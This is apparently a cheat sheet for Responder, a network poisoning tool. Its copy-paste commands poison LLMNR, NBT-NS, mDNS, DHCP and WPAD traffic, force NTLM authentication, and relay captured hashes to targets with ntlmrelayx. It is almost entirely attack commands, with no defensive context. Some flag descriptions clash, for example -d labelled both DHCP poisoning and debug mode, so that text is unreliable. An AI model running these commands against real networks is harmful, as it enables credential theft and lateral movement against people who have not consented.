Responder
Responder is a LLMNR, NBT-NS, and MDNS poisoner. It answers specific queries on a network to divert traffic to the attacker's machine, allowing for the capture of NTLMv1/v2 hashes.
Installation
Install Responder on Debian/Kali
sudo apt update && sudo apt install responder
From Source
git clone https://github.com/lgandx/Responder.git cd Responder pip3 install -r requirements.txt sudo python3 Responder.py --help
Basic Usage
sudo responder -I eth0 #Start Responder poisoning on interface eth0 sudo responder -I eth0 -v #Enable verbose output sudo responder -I eth0 -dw #Enable WPAD and HTTP authentication capture sudo responder -I eth0 -A #Analyze mode (no poisoning) sudo responder -I eth0 -v -FDdP #All out attack
Interface Selection
ip a #Identify available interfaces sudo responder -I eth0 #Run Responder on ethernet interface sudo responder -I wlan0 #Run Responder on wireless interface sudo responder -I tun0 #Run through VPN interface
LLMNR / NBT-NS / mDNS Poisoning
sudo responder -I eth0 -rdw #Enable LLMNR, NBT-NS, and WPAD poisoning sudo responder -I eth0 -r #Enable NetBIOS Name Service poisoning sudo responder -I eth0 -d #Enable DHCP poisoning sudo responder -I eth0 -m #Enable mDNS poisoning
Credential Capture
sudo responder -I eth0 -v #Capture NTLMv1/NTLMv2 authentication attempts sudo responder -I eth0 -wrf #Force WPAD authentication and capture hashes sudo responder -I eth0 -F #Force NTLM authentication sudo responder -I eth0 -w #Start WPAD rogue proxy server
Common Attack Scenarios
Capture Windows NTLMv2 Hashes
sudo responder -I eth0 -v #Passively capture NTLM authentication sudo responder -I eth0 -rdwv #Capture hashes via LLMNR/NBT-NS poisoning
WPAD Rogue Proxy Attack
sudo responder -I eth0 -w #Enable WPAD rogue proxy sudo responder -I eth0 -wdF #Force authentication through WPAD
Passive Network Analysis
sudo responder -I eth0 -A #Analyze traffic without poisoning sudo responder -I eth0 -Av #Analyze mode with verbose output
Integration With Other Tools
Responder & ntlmrelayx
sudo responder -I eth0 -rdwv #Capture NTLM authentication ntlmrelayx.py -tf targets.txt -smb2support #Relay captured credentials
Hash Storage Locations
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-* #View captured SMB hashes cat /usr/share/responder/logs/HTTP-NTLMv2-* #View captured HTTP authentication hashes cat /usr/share/responder/logs/* #View all captured credentials
Responder Configuration
nano /etc/responder/Responder.conf #Edit Responder configuration cat /etc/responder/Responder.conf #View current configuration grep SMB /etc/responder/Responder.conf #Check SMB poisoning settings
Responder Servers
sudo responder -I eth0 -rdwv #Enable SMB, HTTP, HTTPS credential capture sudo responder -I eth0 -wF #WPAD proxy with forced authentication sudo responder -I eth0 -rf #Enable NetBIOS and authentication forcing
Verbose & Debug Modes
sudo responder -I eth0 -v #Verbose output sudo responder -I eth0 -vv #Extra verbose output sudo responder -I eth0 -d #Debug mode
Stopping Responder
CTRL + C #Stop Responder poisoning ps aux | grep responder #Check if Responder is still running sudo killall python3 #Kill Responder process